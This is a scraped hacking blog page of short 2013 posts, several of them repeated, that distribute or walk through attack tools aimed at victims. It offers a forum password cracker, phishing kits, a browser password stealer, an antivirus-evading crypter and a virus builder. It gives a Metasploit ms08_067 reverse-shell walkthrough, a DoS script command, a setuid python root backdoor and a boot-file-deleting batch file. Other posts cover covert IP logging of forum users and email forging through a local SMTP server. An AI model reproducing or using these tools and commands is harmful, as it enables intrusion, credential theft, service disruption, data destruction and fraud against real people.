Wednesday, October 30, 2013
10:44 AM
No comments
Updates
- XSS Scanner
- RFi Scanner Bug fixed
- Remove Duplicate algoritm chanded
Virus Scans:
https://www.virustotal.com/en/file/7c238a65f81b1fa71b241809ecbe84aab04f3c96872bae799abfd3ca8840427e/analysis/1339689371/ - Click Here To Download
10:40 AM
No comments
MyBB Account Cracker :
How To Use:
[#] Type in the forum name without http://www.
[#] Click Import list and import a Passwords list.
[#] Type in the username of the account you would like to try and crack.
[#] Press start and it should start the cracking process.
[#] The download includes a very good pass list for you to use.
Click Here To Download
How To Use:
[#] Type in the forum name without http://www.
[#] Click Import list and import a Passwords list.
[#] Type in the username of the account you would like to try and crack.
[#] Press start and it should start the cracking process.
[#] The download includes a very good pass list for you to use.
Click Here To Download
10:36 AM
No comments
Here
is a simple and effective way of getting the IP address of forum
users. I will explain two methods for doing this. The first method
is
not as effective as the second but they both work very well! In the
first method we get a lot of IP addresses and can't really tell
one
from another. However, it can be good if you are targetting a
specific group of people or something like that. The second
method
will give you a specific persons IP address, but works only
on forums where you can embed images in Private Messages.
Now
let's get down to business![/font]
Method One - Get a lot of IP
addresses from users.
Method
Two: Get specific users IP
address.
This method is very much like the first one and does not
need to be put down in steps. Instead of posting a thread, write a
PM
to the user whose IP you need and wait for him to view the PM. Be
sure to embed the image in the PM and you'll get his
IP address as
soon as he views the PM. This is very effective if you need to hit
someone who is trolling on forums.
I hope you put this to good
use. There are at on of uses for this method and you just need a
little creativity to get any persons
IP address. Very simple but
still incredibly effective when used the right way. I hope you
enjoyed this tutorial. Feel free to
post any comments or concerns
you may have.
is a simple and effective way of getting the IP address of forum
users. I will explain two methods for doing this. The first method
is
not as effective as the second but they both work very well! In the
first method we get a lot of IP addresses and can't really tell
one
from another. However, it can be good if you are targetting a
specific group of people or something like that. The second
method
will give you a specific persons IP address, but works only
on forums where you can embed images in Private Messages.
Now
let's get down to business![/font]
Method One - Get a lot of IP
addresses from users.
Step
One
One
First
things first. We need to have a target. I recommend you to go
elsewhere with
your evil deeds Awink I am sure that you already
have a forum in mind so let us move on.
Let us begin by making
a arbitrary thread. Be sure to make the thread interesting so that
you get a lot of views.
Every view will provide you with a IP
address so this is important if you want victims.
things first. We need to have a target. I recommend you to go
elsewhere with
your evil deeds Awink I am sure that you already
have a forum in mind so let us move on.
Let us begin by making
a arbitrary thread. Be sure to make the thread interesting so that
you get a lot of views.
Every view will provide you with a IP
address so this is important if you want victims.
Step
Two
Two
Go
to this website: http://iplogger.org/getnewid.php
Then
copy the second link. It is a MyBB code with an image, and looks
something like this:
to this website: http://iplogger.org/getnewid.php
Then
copy the second link. It is a MyBB code with an image, and looks
something like this:
Now
add this code anywhere in the thread. IT is an invisible image so do
not worry about it being seen.
It can't unless someone quotes your
thread.
add this code anywhere in the thread. IT is an invisible image so do
not worry about it being seen.
It can't unless someone quotes your
thread.
Step
Three
Three
Now
all you need to do is submit the thread, sit back and relax. On the
IPlogger website, click "View Log" and see all the
IP
addresses of people who visited your thread. Now get dirty and do
what you want with the IP addresses Smiling
all you need to do is submit the thread, sit back and relax. On the
IPlogger website, click "View Log" and see all the
IP
addresses of people who visited your thread. Now get dirty and do
what you want with the IP addresses Smiling
Two: Get specific users IP
address.
This method is very much like the first one and does not
need to be put down in steps. Instead of posting a thread, write a
PM
to the user whose IP you need and wait for him to view the PM. Be
sure to embed the image in the PM and you'll get his
IP address as
soon as he views the PM. This is very effective if you need to hit
someone who is trolling on forums.
I hope you put this to good
use. There are at on of uses for this method and you just need a
little creativity to get any persons
IP address. Very simple but
still incredibly effective when used the right way. I hope you
enjoyed this tutorial. Feel free to
post any comments or concerns
you may have.
10:32 AM
No comments
First of all ! Dont OPEN EXECUTE File !
it will turn off your monitor and copy itself to Startup [Basic]
this codes belong to long time ago so i removed many part of it
this program only turnoff your monitor permanently until you restart your computer
it will turn off your monitor and copy itself to Startup [Basic]
this codes belong to long time ago so i removed many part of it
this program only turnoff your monitor permanently until you restart your computer
Click Here To Download
10:28 AM
No comments
You probably sometimes visit a great web site and then after a few
seconds pop up annoying surveys ..........., If you’re one of those who
do not like to waste their time filling surveys or sometimes there is no
surveys available for your country, then.........
Don't worry,
You can use NoScript 2.0.3
This is a firefox a Add-on through which you can bypass pop-up surveys and other similar things....
Don't worry,
You can use NoScript 2.0.3
This is a firefox a Add-on through which you can bypass pop-up surveys and other similar things....
10:23 AM
2 comments
Includes :-
*PayPal Phishing
*Facebook Phishing
*Gmail Phishing
Click Here ToDownload
Virus Scan Link :-
https://www.virustotal.com/en/file/792b531073b626bf2d5dc7d6a0558a33cf133853e57482382656470a1b5a1107/analysis/1381545978/
*PayPal Phishing
*Facebook Phishing
*Gmail Phishing
Click Here ToDownload
Virus Scan Link :-
https://www.virustotal.com/en/file/792b531073b626bf2d5dc7d6a0558a33cf133853e57482382656470a1b5a1107/analysis/1381545978/
10:17 AM
No comments
Let me start by giving thanks to AUDI for this awesome labs :
LAB LINK : SQLI LAB by AUDI with all videos
DOWNLOAD LAB HERE : SQLI LAB by AUDI8 (GIT)
1. Download the lab from above.
2. Unzip it and copy to the directory :: /var/www (I renamed it to sqli-labs for easy use )
3. Now type in terminal su (if not using backtrack or not in root mode)
4. Then type start mysql and /etc/init.d/apache2 start
5. Type cd /var/www/sqli-labs/sql-connections and then type ......
6. nano db-creds.inc
7. Replace ROOT and TOOR with your username and password (Root and Toor are default user & pass for BT)
8. Save it by Hitting Ctrl+X .
9. Now in browser type http://localhost/sqli-labs and hit enter .
10. Click on Setup/reset Database for labs .
11. Now in browser type http://localhost/sqli-labs/Less-1
12. It will say to input id parameter so type http://localhost/sqli-labs/Less-1/?id=1 change the value ahead of id (1,2,3 so on....)
LAB LINK : SQLI LAB by AUDI with all videos
DOWNLOAD LAB HERE : SQLI LAB by AUDI8 (GIT)
1. Download the lab from above.
2. Unzip it and copy to the directory :: /var/www (I renamed it to sqli-labs for easy use )
3. Now type in terminal su (if not using backtrack or not in root mode)
4. Then type start mysql and /etc/init.d/apache2 start
5. Type cd /var/www/sqli-labs/sql-connections and then type ......
6. nano db-creds.inc
7. Replace ROOT and TOOR with your username and password (Root and Toor are default user & pass for BT)
8. Save it by Hitting Ctrl+X .
9. Now in browser type http://localhost/sqli-labs and hit enter .
10. Click on Setup/reset Database for labs .
11. Now in browser type http://localhost/sqli-labs/Less-1
12. It will say to input id parameter so type http://localhost/sqli-labs/Less-1/?id=1 change the value ahead of id (1,2,3 so on....)
4:35 AM
No comments
What You Need To Do..
1.Backtrack
2.slave's Ip Address.
3.Payload
4.Exploit
So Let's Start With Metasploit....
Steps To Be Followed.
Step-1:-Start The Backtrack And Open the Metasploit.We Are using Simple exploit that ms08_067_netapi.That is vulnerability in Windows XP[/b]
Description:-
This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development.
Commands-"msf:>use exploit/windows/smb/ms08_067_netapi
Step-2:-You Want to set your LHOST means where you want to your reverse connection That is localhost.msf:>set LHOST eg.192.168.1.1
Step-3:- Here You want Set RHOST Ip address to Get remote's ip address use your mind how to get it.eg.Tracing,Fake script or tracking email got it
msf:>set RHOST eg.192.168.1.100
Step-4:-After All this You want to Set Payload.Payload is the piece of software that lets you control a computer system after it’s been exploited
msf:>set PAYLOAD windows/meterpreter/reverse_tcp
Now everything is Done now Just do one thing with one Command that is called.
msf:>exploit
After getting meterpreter use some commands to get a system.
eg. meterpreter:>getpid (to get process id)
(to migrate process) Meterpreter:>migrate process id
And anything Like this If You want All commands do one thing
Meterpreter:>? (question mark)
1.Backtrack
2.slave's Ip Address.
3.Payload
4.Exploit
So Let's Start With Metasploit....
Steps To Be Followed.
Step-1:-Start The Backtrack And Open the Metasploit.We Are using Simple exploit that ms08_067_netapi.That is vulnerability in Windows XP[/b]
Description:-
This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development.
Commands-"msf:>use exploit/windows/smb/ms08_067_netapi
Step-2:-You Want to set your LHOST means where you want to your reverse connection That is localhost.msf:>set LHOST eg.192.168.1.1
Step-3:- Here You want Set RHOST Ip address to Get remote's ip address use your mind how to get it.eg.Tracing,Fake script or tracking email got it
msf:>set RHOST eg.192.168.1.100
Step-4:-After All this You want to Set Payload.Payload is the piece of software that lets you control a computer system after it’s been exploited
msf:>set PAYLOAD windows/meterpreter/reverse_tcp
Now everything is Done now Just do one thing with one Command that is called.
msf:>exploit
After getting meterpreter use some commands to get a system.
eg. meterpreter:>getpid (to get process id)
(to migrate process) Meterpreter:>migrate process id
And anything Like this If You want All commands do one thing
Meterpreter:>? (question mark)
4:33 AM
No comments
What are Stealer's ?
It is a small software which steals passwords that are stored in our web browsers, chat apps such as yahoo messenger .etc , Stealer's then send these stolen passwords to the Hackers FTP server, Usually Stealer's look like keyloggers but there are manydifferences, Stealer's steal only passwords that stored in the web browsers they wont capture keystrokes typed by the user
Advantages of Stealer's
Its very easy to use, Its very small in size and thus Very easy to bypass antivirus detection by using some of the techniques mentioned below
- Crypting
- Binding
Disadvantages
It steals passwords that are only stored in the browsers and chat apps , This hack wont work if victim has not saved his passwords in his web browser , It has very few features Unlike a keylogger which has many features like live monitoring, chat logs etc , Its not that stable as keyloggers
But Why Elite Stealer?
We suggest you use Elite Stealer because unlike
i stealer or any other stealer has lots of bugs which are not fixed
yet. i had absolute no problem with elite stealer at all.
Do You Want A Tutorial For Setting This Elite Stealer up?
We haven't
been getting much replies from users .. as i see there are you Viewers
then feedback. If you want a tutorial for this reply here that you do .
We will do post tutorial but with your feedback it will make much
more interest.
Download Link
4:20 AM
No comments
DoS.Pl Script
Login
as per normal. (normally the username is root & the password is
provided by the host provider) This tutorial is based on CentOS.
Code:
yum install perl -y
Log into WinSCP (with the same details as you had used before to log into PuTTy)
Drop the "dos.pl" anywhere on that page.
Log back into PuTTy and type the following to launch an attack
Code:
perl dos.pl <ip> <port> 65500 <time>
Code:
perl dos.pl 1.1.1.1 80 65500 120
4:15 AM
No comments
Ok, I'm gonna teach you how to do something
really sneaky that people don't usually look for to backdoor your roots
so you can keep them. First make sure you have a few shells hidden so if
you get locked out you can get back in.
(This is just a quick tutorial i ll post a HQ Detailed one soon)
Next you just want to
Command:-
chmod 4755 or chmod +s /usr/bin/py
Now, anytime you run python you will have root!
Command:-
python -c "z=__import__('os'); z.setuid(0); z.system('sh')"
or Just use a py connect-back shell and you'll have root.
4:11 AM
1 comment
DezCrypt FUD Crypter! (Fully undectable)
What Is Crypter?
Crypter is a software used to hide our viruses, keyloggers or tools from antiviruses so that they are not detected by anti viruses. Thus, a crypter is a program that allow users to crypt the source code of their program to Bypass antivirus detection
What Does UD And FUD Mean?
UD means undetected, so only a few antivirus programs detect it. FUD means fully undetected, so no antivirus detects it
I have already given you a Free FUD Crypter which is outdated now, So today i will give you a free FUD Crypter (fully undetectable by anti viruses ) with which you can crypt any keyloggers or viruses
The password of mediafire link is "dezired"
Download Link
Tuesday, October 29, 2013
5:55 PM
No comments
Just copy the below code in notepad and save it as anyname.bat and when you open the file it will shutdown your computer and then you will not able to restart it
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.inidel c:\windows\win.ini
5:52 PM
No comments
Name of the virus
on startup Save viruses
HOMEDRIVE Save in
the Save in system32
Save on Desktop
Disable scheduled tasks
Create 10 users
Corrupt files the System
Open a Windows command 10
Start 10 times more annoying web pages
Restore midnight
Use of Memory
on startup Save viruses
HOMEDRIVE Save in
the Save in system32
Save on Desktop
Disable scheduled tasks
Create 10 users
Corrupt files the System
Open a Windows command 10
Start 10 times more annoying web pages
Restore midnight
Use of Memory
These options determine the effectiveness of your virus. You can choose the desired options according to the damage you cause to the victim wants. Once you set your preferences, press ENTER and Virus Creator creates for you the trojan. Now,
all you need created to do is send the virus to the victim and ask him
to run the virus on your computer (Social Engineering).
5:35 PM
No comments
AxCrypt is the leading open source Windows file encryption software.
It integrates seamlessly with Windows to compress, encrypt, decrypt,
store, send and work with individual files.
Personal Privacy and Security with AES-128 File Encryption and
Compression for Windows 2000/2003/XP/Vista/2008/7. Double-click to
automatically decrypt and open documents. Store strong keys on removable
USB-devices.
Features
- Password Protect any number of files using strong encryption.
- Right-click integration with Windows Explorer makes AxCrypt the easiest way to encrypt individual files in Windows.
- Double-click integration makes it as easy to open, edit and save protected files as it is to work with unprotected files.
- Many additional features, but no configuration required. Just install it and use it.
- AxCrypt encrypts files that are safely and easily sent to other users via e-mail or any other means. Self-decrypting files are also supported, removing the need to install AxCrypt to decrypt.
- AxCrypt is translated into English, Danish, Dutch, French, German, Hungarian, Italian, Norwegian, Russian, Polish, Spanish and Swedish so chances are it speaks your preferred language.
AxCrypt is free software; you can redistribute it and/or modify it
under the terms of the GNU General Public License as published by the
Free Software Foundation.
5:31 PM
No comments
Step #1:
Create a Facebook page using the “More” link in the left sidebar’s bottom. You can also land on any page and click on “Create page” button there.
Click on “I agree to Facebook Pages terms” and get started. Now, you will be taken to the page for adding description, website and page username. Input description for the page and also page’s username (recommended). Provide other details if you wish, else skip them all. You may add those details later too.
Step #5:
After landing into the page, go to Edit Page > Update Info. Click Edit button near the name field. now, place the insertion point on the starting of the text in the text box and hit delete key on your keyboard.
Step #6:
Click on Save Changes to save the page name. View the page to see for the changes. If the name change was not proper, you can see a symbol in the page activity section.
Create a Facebook page using the “More” link in the left sidebar’s bottom. You can also land on any page and click on “Create page” button there.
Step #2:
Select any category depending upon what your page should be. The category doesn’t matter in this trick.
Step #3:
The name part in the category page matters a lot in this trick. Now, you may need some special characters temporarily for creating the page. The below text box will help you to copy the special characters. Place the mouse pointer on the text box and press Ctrl + A. Now, Ctrl + C will copy all the text right here in the text box.
copy this
Paste the copied text on the category page of Facebook where you are now for creating a invisible page.
Step #4:Step #3:
The name part in the category page matters a lot in this trick. Now, you may need some special characters temporarily for creating the page. The below text box will help you to copy the special characters. Place the mouse pointer on the text box and press Ctrl + A. Now, Ctrl + C will copy all the text right here in the text box.
copy this
Click on “I agree to Facebook Pages terms” and get started. Now, you will be taken to the page for adding description, website and page username. Input description for the page and also page’s username (recommended). Provide other details if you wish, else skip them all. You may add those details later too.
Step #5:
After landing into the page, go to Edit Page > Update Info. Click Edit button near the name field. now, place the insertion point on the starting of the text in the text box and hit delete key on your keyboard.
Step #6:
Click on Save Changes to save the page name. View the page to see for the changes. If the name change was not proper, you can see a symbol in the page activity section.
5:22 PM
No comments
Most
of the email forging tutorials1 on internet will teach us how to send
fake email connecting to SMTP server of the ISP or any other domain. But
this is not possible since these hacks will no longer work today
because SMTP of remote server will reject any attempts for unauthorized
access. Also many of the websites offer you to send fake email from
their sites where none of them work. So we have to run our
own SMTP server on our computer to successfully send a fake
email. SMTP server is a simple software program which can be installed
on your computer in few seconds.SMTP server allows you to send fake
email right from your desktop easily and effectively. .
This is the SMTP server i am using in my tutorial. Once you download
and install the server on your comp then you are all set to send fake
email successfully.
PART A: CONFIGURING SMTP SERVER
Once you have installed the QK SMTP server on your comp you must perform the following configuration.
1. Click on “Settings” button on the main screen,the Settings window pops up
2. On Settings window click on “Basic Parameter” tab
3. Set binding IP to “127.0.0.1?
4. Set port to “25?
PART B: SENDING FAKE EMAIL (EMAIL FORGING)
1. Click on SMTP server icon on your desktop to start
your SMTP server to run(The icon is shown on the notification area of
the taskbar if it is running). If it is already running then this step
can be ignored
2. Goto command prompt(Start-Accessories-Command prompt)
3. Type exactly as follows
C:>telnet 127.0.0.1 25
Here 127.0.0.1 is the default IP of every computer.25 is the port
number. SO you are connecting to the SMTP serverrunning on your own
computer.This step is very important to send fake email.
NOTE: The IP 127.0.0.1 should not be substituted by any other IP.
Heres the snapshot of what you see after step 3. Click on it to enlarge
4. After typing the telnet command in the command prompt you get entry
to the server which displays the following message. The response of a
OK SMTP server is given below. Message within Green color is only explanation.
220 Welcome to QK SMTP Server 3
helo hacker (Type helo & any name followed by space)
250 Hello hacker (Server Welcomes You)
mail from:billg@microsoft.com (email ID can be anything of your choice. This is the ID from which fake emailappears to have come from)
250 billg@microsoft.com Address Okay (Server gives a positive response)
rcpt to:admin@gmail.com (Type any valid recipient email address)
250 admin@gmail.com Address Okay (Server gives a positive response)
data (type this command to start input data)
354 Please start mail input
From:Gates <billg@microsoft.com>
To:admin@gmail.com
Date:Thu Aug 5,2010 9:45 PM
Subject:Test to send fake email
You can create as many headers followed by the “:” symbol.
NOTE:HEADERS SHOULD NOT CONTAIN A LINE GAP. IF SO IT IS CONSIDERED AS
BODY OF THE EMAIL. Press enter twice so that there is a line gap between
the header & body data
<HERE IS YOUR DATA>End the body of email by pressing [ENTER] .(dot) [ENTER]
250 Mail queued for delivery (Sever indicates that the email is ready for sending)
quit (Type this command to quit from server)
221 Closing connection. Good bye.
Connection to host lost
(You will get the above 2 lines of message after typing “quit” command)
(Your fake email is sent to the recipient)
*****END OF EMAIL FORGING****
DOWNLOAD LINK FOR SMTP SERVER
Subscribe to:
Posts (Atom)